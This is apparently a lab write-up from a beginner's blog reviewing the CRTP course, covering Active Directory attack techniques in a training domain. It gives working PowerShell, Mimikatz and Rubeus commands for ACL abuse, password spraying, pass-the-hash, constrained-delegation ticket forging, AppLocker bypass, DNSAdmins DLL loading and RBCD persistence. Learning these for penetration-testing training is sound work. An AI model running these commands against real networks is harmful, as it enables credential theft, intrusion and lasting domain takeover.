Review & Sharing experience Active Directory (AD) Attack
Intro
First of all, This blog I use lab from CRTP in pentester academy to study and I will preview just some exploit from my understanding not full method.It is recommand for people without background AD attack but want to start as beginner.It use pure powershell exploit.No post exploitation framework because it really beginner.
In CRTP course provide both video walkthough and walkthough pdf and tools available on study lab.So, you not need to worry that you will not be able to solve lab but you have to dig deep into detail by yourself more than course provided.I wrote this blog because I want to show some method which not refer in CRTP course or detail much in walkthough to help you understand AD attack
Okays, from this picture it start from external recon and then compromise machine.You can try since start like this from ePTXv2 because it will teach external recon from kali machine scan all IP network find which port can try attack or find all users in company for do social engineering and then embeded macro into excel file and delivery via email outlook (Insider attack).You can read Social engineering solution on ePTXv2 from this blog.He may pretend to be some user in company and sent it to IT department that has rights to access all servers in company to open that macro file and then a attacker get shell to one server in company after IT guy click open that macro which is compromise machine.
But I do not recommend people to buy ePTXv2 if no background on AD attack. You can read review from someone here. ePTX is good course but not friendly for beginner.It is my personal experience because I bought both ePTXv2 and CRTP and feel like CRTP make me understand more from basic.
In CRTP, it assume you compromise server and start from internal recon that above picture and main focus on powershell command.
Internal Recon
- What role we are now? => whoami
- Which privilege group we are? => whoami /groups
For example:
1) Result show we are in group BUILTIN\Administrator
It means we can run command as local admin and recon creds of domain admin in next step (If our group show we are domain admin,it should show jefflab\administrators)
2) Result show we not part of local admin, we have to escalate our current user to be admin or have some privilege group relate to domain like dcorp\RDPUsers in domain
We can try enumerate with bloodhound to see what’s this group can do or rights to access any servers in current domain
That yellow symbol is RDPUsers group which after expand map,it shows all user and our user is part of RDPUsers group and RDPUsers group is admin to DCORP-ADMINSRV machine.I will talk about it later from this point.
3. Which users is local admin? => net localgroup administrators
When we know which user is local admin, we may try search password in description from this command
Find-UserField -SearchField Description -SearchTerm “built”
Or try abuse GPO to add current user to be local admin.You can read this technique from blog “gpo-abuse-and-you” which use tool name “metronome.cs” to edit GPO but this C# in github use with .Net version 3.5 but in CRTP lab can’t use .Net version 3.5.You can try create AD lab for pracitce by yourself.Except this has tool SharpGPOAbuse for find misconfiguration GPO on AD.
Guideline for people who not know how to complie .cs file to exe from github.You can download .Net from Microsoft website and use csc to complie C:\WINDOWS\Microsoft.NET\Framework\v[your version number]\csc.exe
About abuse ACL, recommend listen this youtube “Here Be Dragons The Unexplored Land of Active Directory ACLs”. They talk about how to add permission and delete permission command on ACL and iredteam blog and some tool like Invoke-ACLpwn (use with .Net 3.5) for privilege escalation and this blog of Nikhil teach about RACE toolkit use for abuse ACL
In case ACL, we may find SPN user or any useful account that can use for lateral movement to next machine by check that our current user has rights as GenericALL on that user or Generic Write for edit password without know current password and then use PSremoting with that credential
For example check ACL on RDPUsers group
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match “RDPUsers”}
We saw that ControlXUser has rights as GenericALL on AD.It means if we compromise this account.We can add rights ACL on AD to our current user too.Let’s try abuse by change password on ControlXUser.If current user has rights abuse ACL over this user,it will show password successful reset
Set-DomainUserPassword -Identity Control46User -Verbose
$pwd = ConvertTo-SecureString ‘Password1234’ -AsPlaintext -Force
$cred= New-Object System.Management.Automation.PSCredential (“Control46User”, $pwd)
Let’s try check this user can access any machine that can jump to AD
Invoke-UserHunter -UserName Control46User
For example this user can access dcorp_test and dcorp_test can jump to DC, we can use PSremoting with credential like this command
Enter-PSSession -ComputerName dcorp_test -Cred $cred
In case windows privilege escalation, you can use tool like PowerUP, Beroot, Privesc.ps1 and so on.I think this pdf will help guide you AD attack
You may found credential in registry or misconfiguration service to abuse or remote code execution from dll hijacking
Can we found user that password not expired and use bad password?
Command for check password not expired
get-aduser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq “true” } | where {$_.enabled -eq “true”}
Command for check bad password
Get-UserProperty -Properties badpwdcount
Command for check policy password
Get-ADDefaultDomainPasswordPolicy
Create wordlist password that match policy and try password spray from crackmapexec.exe to check which password can use for login as admin user on our server. See tutorial from STEALTBITS here
4. What’s current domain name? => Get-NetDomain
Result will show both domain controller name and forest domain name
5. What’s domain controller name? => Get-NetDomainController
6. What’s domain admin of current domain? => Get-NetGroupMember -GroupName ‘Domain Admins’
7. What’s domain admin of forest domain (Enterprise admin)? => Get-NetGroupMember -GroupName ‘Enterprise Admins’ -Domain <forest domain name here>
Assume we are local admin now.Next step is lateral movement to be domain admin on current domain for find creds on DC to jump to forest domain and stay persistent on DC for back again and again to get infomation
Lateral movement to be Domain Admin
1. By jump to another machine that can go to Domain Controller
1.1 Local admin access (derivative admin)
We can use PowerView module to check our current user has local admin access to which machine on powershell command
Find-LocalAdminAccess -Verbose
Or use Powershell Empire module powerview to check local admin access
About use module in Powershell Empire is same style like metasploit, you just type info to see which parameter required True (Need to put value) and then execte for run module
You can learn more about powershell empire from here
It shows same result that current user can access dcorp-adminsrv machine.Let’s use BloodHound to check about this machine
We found that machine ‘DCORP-ADMINSRV’ contains APPLOCKED policy.We can try check policy APPLOCK on this machine by this command
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Some interesting policy on AppLocker show allow all members of the Everyone Group to run scripts that are located in the Program Files or Windows Folder.It means we can load any script to that path on dcorp-adminsrv session and then we will can run malicious script inside machine
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\‘Program Files’
and after we enter into adminsrv remote session and execute script Invoke-Mimikatz, we will get all credential on this machine
1.2 check all live machines and port to get access that machine
Get-NetComputer -Ping
Check IP each machine by ping command
ping dcorp-ci.dollarcorp.moneycorp.local
Use Invoke-PortScan to check all range IP that we found from ping command
Invoke-PortScan -StartAddress 172.16.2.1 -EndAddress 172.16.100.100 -ScanPort
We may see some machine open port 80 and we get reverse shell to machine from that website
Caution: technique about jump from machine 1 to machine 2 for find any machine.Focus on dump hash credential of all users on new machine by Invoke-Mimikatz for pass-the-hash to domain controller or Invoke-userHunter -CheckAccess to Domain Controller or any machine that has credential to access Domain Controller from current machine
1.3 constrain delegation user
Step 1: Find constrain delegation user
. C:\AD\Tools\Powerview_dev.ps1
Get-DomainUser -TrustedToAuth
We will see that user websvc allow delegate to service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL (This technique may not show it really access to domain controller but in some case we may see constrain delegation user allow to delegate to share file service on domain controller)
In CRTP course, he teach with kekeo create ticket and use dir to check access to we have rights to read on that machine.From this step you can use PSExec.exe to access to that machine for run command
Or use Rubeus.exe to create ticket and then impersonate to be admin to gain access on machine with parameter altservice which kekeo not has
Step 2: Use Rubeus to create ticket to service constrained delegation
.\Rubeus.exe asktgt /user:websvc /domain:dollarcorp.moneycorp.local /rc4:<websvc ntlm hash value>
Step 3:Copy all base64 value and put into text file name websvc.txt and then pass all value in websvc.txt to parameter $b64
Step 4: Create file kirbi from base64 value
[IO.File]::WriteAllBytes(“c:\AD\Tools\temp\websvc_axis.kirbi”, [Convert]::FromBase64String($b64))
Step 5: use Rubeus pass the ticket to gain access to dcorp-mssql
.\Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /impersonateuser:administrator /msdsspn: “cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL” /ticket:c:\AD\Tools\temp\websvc_axis.kirbi /altservice:http /ptt
Verify ticket was created successful
Gain access to dcorp-mssql
You can learn how to use kekeo from CRTP course but I just want to show Rubeus can do on this case too.
2. By privilege escaltion to be privilege user on Domain controller
2.1 Domain password Spray from this github
Import-Module .\DomainPasswordSpray.ps1
Step 1: find all user in domain save to file users.txt
Get-DomainUserList -Domain dollarcorp.moneycorp.local -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii users.txt
Step 2: check domain password policy and create password list
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1
Get-ADDefaultDomainPasswordPolicy
Step 3: Try domain password spray
Invoke-DomainPasswordSpray -UserList users.txt -Domain dollarcorp.moneycorp.local -PasswordList password.txt -OutFile sprayed-creds.txt
In case of password spray, you may got domain admin account or got any useful account that can use to access machine for dump credential of privilege user
After get plaintext password, we can use powershell remote with credential or use module DSInternals to reverse it to ntlm hash and use mimikatz for pth
Import-Module .\DSInternals.PowerShell
Import-Module .\DSInternals.Common.dll
Import-Module .\DSInternals\DSInternals.psd1
$pwd = ConvertTo-SecureString ‘Password1234’ -AsPlaintext -Force
ConvertTo-NTHash $pwd
2.2 DNSadmin to Domain Admin
- First we need to know who is DNSadmin
Get-NetGroupMember -GroupName “DNSAdmins”
- Identify that now we are in group DNSAdmins by whoami /groups
- If we are not a member of DNSAdmins, we have to find credential of this user by check from which machine current user and DNSadmin has access
Invoke-UserHunter -UserName srvadmin
- and then pass the hash of user srvadmin on mimikatz
Invoke-Mimikatz -Command ‘“sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm value>/run:powershell.exe”’
- It required DNS server running and if you are administrator, you can open Server and manager and then add then click add ‘role and features’ DNSserver
Abuse configuartion on DNS name “serverlevelplugindll” to load malicious dll into DNS on domain controller and that dll file should be able to read by Everyone
You can continue read in detail from Nikhil blog, he talk about how to adjust dll code in kdns.c to be reverse powershell and another technique recommend to watch from ippsec video ‘resolute’, He teach about reverse shell on DNS server by adjust code on dns-exe-persistent to import function reverse powershell which is stable and not make DNS service fail like msfvenom and this medium blog describe why it is “serverlevelplugindll”
Persistence
The reason why it need to do persistence because when attacker got into forest domain,They can back to steal data from server any time
It has many method that CRTP course refer in walkthough pdf but I will show one method that they not teach is Resource base constrained delegation (Abusing RBCD) by create fake machine in domain
Step 1: Check quota machine on domain
Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
It shows machine quota = 10
Step 2: Use module from powermad to create fake machine for join domain
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString ‘123456’ -AsPlainText -Force) -Verbose
Step 3: Check SID of fake machine that we just created
Step 4: Use pth run Domain Admin powershell for try abuse RBCD on domain controller
Set-ADComputer DCORP-DC$ -PrincipalsAllowedToDelegateToAccount FAKE01$ -Verbose
Step 5: Verify that Domain Controller allow to delegate to fake machine
Get-ADComputer DCORP-DC$ -Properties ‘msds-allowedtoactonbehalfofotheridentity’
Get-ADComputer DCORP-DC$ -Properties PrincipalsAllowedToDelegateToAccount
Step 6: change password that we set to fake machine to ntlm hash
$pwd = (ConvertTo-SecureString ‘123456’ -AsPlainTex -Force)
ConvertTo-NTHash $pwd
# computer machine hash = 32ed87bdb5fdc5e9cba88547376818d4
Step 7: Gain access back to domain controller with ntlm hash of fake machine
Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /user:FAKE01$ /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:”cifs/dcorp-dc.dollarcorp.moneycorp.local” /ptt
Recommend learning platform for red teaming
CRTP -> CRTE -> PACES + offshore + rastalab/ ePTXv2 (optional) -> CRTO
HackTheBox machines that can try AD attack (Bloodhound, PowerView)
Cascade
Sauna
Monteverde
Sizzle
Lightweight
Forest
Active
RE
Access
Reel
Arkham
Bastion
Giddy
**Good blog sauna writeup for getting start Covernant here (you can read more about Covernant framework here)
**Good blog vault write up for learn socks4 proxy here
Tryhackme machines that you can try AD attack
Attacktive Directory
Post-Exploitation Basics
Active Directory Basics
Attacking Kerberos
Cyberseclabs machines that you can try AD attack
Roast
Brute
Office
Mount
Dictionary
Sync
Casino
